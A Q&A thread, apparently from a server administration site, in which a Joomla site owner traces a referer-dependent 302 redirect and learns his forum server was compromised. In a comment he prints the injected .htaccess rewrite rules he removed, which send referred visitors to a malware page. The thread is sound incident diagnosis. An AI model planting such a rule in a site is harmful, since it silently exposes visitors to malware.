1

I am setting up a small website on Joomla and came across a weird redirect problem.

I wanted to include a link in my website to a Forum that is set up in a different server.

When I type or copy/paste the forum url in the browser, it works perfectly: http://www.techcomputerworld.com/almeriarocketry/

This is the request/response:

Request URL:http://www.techcomputerworld.com/almeriarocketry/
Request Method:GET
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Cookie:phpbb3_gu83i_u=1; phpbb3_gu83i_k=; phpbb3_gu83i_sid=5d7245ace142f186e3049d7666c528d7; __utma=214190226.1703438907.1378288831.1378288831.1378288831.1; __utmb=214190226.1.10.1378288831; __utmc=214190226; __utmz=214190226.1378288831.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); style_cookie=null
Host:www.techcomputerworld.com
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36

Response Headersview source
Cache-Control:private, no-cache="set-cookie"
Connection:Keep-Alive
Content-Encoding:gzip
Content-Length:3805
Content-Type:text/html; charset=UTF-8
Date:Wed, 04 Sep 2013 10:05:56 GMT
Expires:0
Keep-Alive:timeout=10, max=29
Pragma:no-cache
Server:Apache
Vary:Accept-Encoding

So I happily inserted a link in my website to that URL. But when I click it, the server throws a 302 redirect to another, completely different location:

Request URL:http://www.techcomputerworld.com/almeriarocketry/
Request Method:GET
Status Code:302 Found
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:__utma=214190226.1703438907.1378288831.1378288831.1378288831.1; __utmc=214190226; __utmz=214190226.1378288831.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); phpbb3_gu83i_u=1; phpbb3_gu83i_k=; phpbb3_gu83i_sid=a6f51f7f13a419b2ba46137a8cd6fc3b; style_cookie=null
Host:www.techcomputerworld.com
Referer:http://clubaereotabernas.net/index.php/el-club/instalaciones
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Response Headersview source
Connection:Keep-Alive
Content-Length:313
Content-Type:text/html; charset=iso-8859-1
Date:Wed, 04 Sep 2013 17:56:33 GMT
Keep-Alive:timeout=10, max=30
Location:http://schiedsrichterge.bplaced.net/acwf.html?h=719406
Server:Apache

The only different that I can see is the referrer header, but I tried to simulate exactly the same values on my REST client and the call returned a 200.

I am experiencing this in Safari, Firefox, Chrome. It doesn't redirect when using IE8.

I have access to the server and can change anything in it, but have no idea where this configuration would be located.

Any help, much appreciated, thanks.

Miguel
  • 21
  • 1
  • 3

2 Answers2

2

The site you're linking to has been compromised. It is redirecting visitors to a page which distributes malware (though the page appears to have been taken down).

If you know the owner of the site, you may wish to inform them of the problem.

Michael Hampton
  • 244,070
  • 43
  • 506
  • 972
  • Thanks! That totally makes sense. How did you know it? – Miguel Sep 11 '13 at 11:07
  • I googled the destination link of the redirect, and a bunch of _other_ sites came up that reported it as malware :) – Michael Hampton Sep 11 '13 at 12:42
  • Someone introduced this in the .htaccess in my server: RewriteEngine On RewriteBase / RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC] RewriteRule ^.*$ http://schiedsrichterge.bplaced.net/acwf.html?h=719406 [L,R] Removed it and it works (no need to restart anything) – Miguel Sep 15 '13 at 19:12
1

It's something with your configuration. There is somewhere checked http referer and redirection made.

Without referer (when you paste url into browser)

$ curl -I 'http://www.techcomputerworld.com/almeriarocketry/'
HTTP/1.1 200 OK
Date: Tue, 10 Sep 2013 11:16:53 GMT
Server: Apache
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Set-Cookie: phpbb3_gu83i_u=1; expires=Wed, 10-Sep-2014 11:16:53 GMT; path=/; domain=.www.techcomputerworld.com; HttpOnly
Set-Cookie: phpbb3_gu83i_k=; expires=Wed, 10-Sep-2014 11:16:53 GMT; path=/; domain=.www.techcomputerworld.com; HttpOnly
Set-Cookie: phpbb3_gu83i_sid=3a5a12af291853ba8299f5f5efc2d6ca; expires=Wed, 10-Sep-2014 11:16:53 GMT; path=/; domain=.www.techcomputerworld.com; HttpOnly
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8

Request with referer ('simulating' click)

$ curl -I -H 'Referer: http://google.com/' 'http://www.techcomputerworld.com/almeriarocketry/'
HTTP/1.1 302 Found
Date: Tue, 10 Sep 2013 11:17:41 GMT
Server: Apache
Location: http://schiedsrichterge.bplaced.net/acwf.html?h=719406
Content-Type: text/html; charset=iso-8859-1

Check your apache configuration (try 'grep -ri bplaced.net /etc/apache*') +logs and Joomla.

radarek
  • 196
  • 1